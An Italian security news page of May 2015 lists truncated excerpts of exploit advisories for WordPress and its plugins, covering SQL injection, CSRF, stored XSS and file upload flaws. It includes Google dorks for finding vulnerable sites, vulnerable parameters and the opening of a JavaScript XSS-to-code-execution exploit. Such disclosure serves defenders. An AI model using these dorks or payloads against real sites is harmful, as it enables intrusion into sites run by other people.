WordPress Ultimate Product Catalogue 3.1.2 SQL Injection

15 maggio 2015 - Fonte: http://www.mondounix.com
--------
ISSUE 1:
 
# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate
Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE...

Leggi il seguito »

WordPress Freshmail 1.5.8 SQL Injection

15 maggio 2015 - Fonte: http://www.mondounix.com
------------------------
ISSUE 1:
 
 
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage:
*http://freshmail.com/ <http://freshmail.com/> *
# Software Link:
*https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
<https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>*
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary
------------------
 
Freshmail plugin is an email...

Leggi il seguito »

WordPress Ad Inserter 1.5.2 CSRF / XSS

9 maggio 2015 - Fonte: http://www.mondounix.com
================================================================
CSRF/Stored XSS Vulnerability in Ad Inserter Plugin 
================================================================
 
 
. contents:: Table Of Content
 
Overview
========
 
* Title :CSRF and Stored XSS Vulnerability in Ad Inserter Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/ad-inserter/
* Severity: HIGH
* Version Affected: Version  1.5.2  and mostly prior to it
* Version Tested : Version  1.5.2
* version patched:
 
Description 
===========
 
Vulnerable Parameter 
--------------------
* ad1_name
* Block 1
* Block Name
* adinserter name
* disable adinserter 
 
 
About...

Leggi il seguito »

WordPress Embed-Articles 7.0.3 CSRF / XSS

9 maggio 2015 - Fonte: http://www.mondounix.com
======================================================
CSRF/Stored XSS Vulnerability in embed articles Plugin
======================================================
 
 
. contents:: Table Of Content
 
Overview
========
 
* Title :CSRF and Stored XSS Vulnerability in embed-articles Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/embed-articles/
* Severity: HIGH
* Version Affected: Version 7.0.3 and mostly prior to it
* Version Tested : Version 7.0.3
* version patched:
 
Description 
===========
 
Vulnerable Parameter 
--------------------
 
* API Key
 
About Vulnerability
-------------------
This plugin is vulnerable to a combination of...

Leggi il seguito »

WordPress Akismet 3.1.1 Cross Site Scripting

9 maggio 2015 - Fonte: http://www.mondounix.com
# Exploit Title: Wordpress Akismet 3.1.1 Plugin - XSS Vulnerability
# Google Dork: inurl:/wp-content/plugins/akismet/akismet.php
# Date: 2014-12-29
# Exploit Author: Ehsan Ice
# Software Link: https://akismet.com/ ,
https://wordpress.org/plugins/akismet/developers/
# Download Link: https://downloads.wordpress.org/plugin/akismet.3.1.1.zip
# Version : 3.1.1
# Tested on: Kali , Windows
# CVE : N/A
 
 XSS Vulnerability
 http://site/wp-content/plugins/akismet/akismet.php
 http://site/wp-content/plugins/akismet/class.akismet-admin.php
 
  Userinput reaches sensitive sink when function add_comment_author_url()
is called.
 
428: print print (wp_update_comment($comment));  // class.akismet-admin.php
426: $comment['comment_author_url']...

Leggi il seguito »

WordPress 4.2.1 XSS / Code Execution

9 maggio 2015 - Fonte: http://www.mondounix.com
/*
Author: @Evex_1337
Title: Wordpress XSS to RCE
Description: This Exploit Uses XSS Vulnerabilities in Wordpress
Plugins/Themes/Core To End Up Executing Code After The Being Triggered With
Administrator Previliged User. ¯\_(ツ)_/¯
Reference: http://research.evex.pw/?vuln=14
Enjoy.
 
*/
//Installed Plugins Page
plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ?
'plugins.php' : 'wp-admin/plugins.php';
//Inject "XSS" Div
jQuery('body').append('<div id="xss" ></div>');
xss_div = jQuery('#xss');
xss_div.hide();
//Get Installed Plugins Page Source and Append it to "XSS" Div
jQuery.ajax({
  url: plugins,
  type: 'GET',
  async: false,
  cache: false,
  timeout:...

Leggi il seguito »

WordPress Ultimate Product Catalogue 3.1.2 XSS / CSRF / File Upload

9 maggio 2015 - Fonte: http://www.mondounix.com
# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate
Product Catalogue 3.1.2
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.5
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1....

Leggi il seguito »

WordPress 4.2 Cross Site Scripting

9 maggio 2015 - Fonte: http://www.mondounix.com
*Overview*
Current versions of WordPress are vulnerable to a stored XSS. An
unauthenticated attacker can inject JavaScript in WordPress comments. The
script is triggered when the comment is viewed.
 
If triggered by a logged-in administrator, under default settings the
attacker can leverage the vulnerability to execute arbitrary code on the
server via the plugin and theme editors.
 
Alternatively the attacker could change the administrator’s password,
create new administrator accounts, or do whatever else the currently
logged-in administrator can do on the target system.
 
*Details*
If the comment text is long enough, it will be truncated when inserted in
the database. The MySQL TEXT type size limit is 64 kilobytes...

Leggi il seguito »

WordPress WooThemes WooFramework 4.5.1 Cross Site Scripting

9 maggio 2015 - Fonte: http://www.mondounix.com
------------------------------------------------------------------------------
WooThemes WooFramework 4.5.1 Authenicated Cross Site Scripting (XSS)
------------------------------------------------------------------------------
 
[-] Vulnerability Description:
 
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
 
the vulnerability is in  function "woo_sbm_callback":
Vuln Code:
function woo_sbm_callback() {
    ...
    $save_type = $_POST['type'];
    ...
    if($save_type == 'woo_sbm_get_links'){
 
        $data = $_POST['data'];
        parse_str($data,$data_array);
        $type = $data_array['type'];
        $slug = $data_array['slug'];
        $name = $data_array['name'];
        $id...

Leggi il seguito »

WordPress Yoast Google Analytics Cross Site Scripting

9 maggio 2015 - Fonte: http://www.mondounix.com
OVERVIEW
==========
 
Google Analytics by Yoast is one of the most popular WordPress
plug-ins with over 7 million downloads and "1+ million" active
installs. Last month Yoast patched a stored XSS we reported in the
plug-in. Shortly after this we identified another bug of a similar
severity. The second stored XSS has now been corrected.
 
An unauthenticated attacker can store JavaScript in the WordPress
administrator’s Dashboard on the target system. The script will be
triggered when an administrator views the Analytics panel next time.
No other user interaction is required.
 
Under default configuration the injected script can execute arbitrary
code on the web server via the plugin or theme editors.
 
Alternatively...

Leggi il seguito »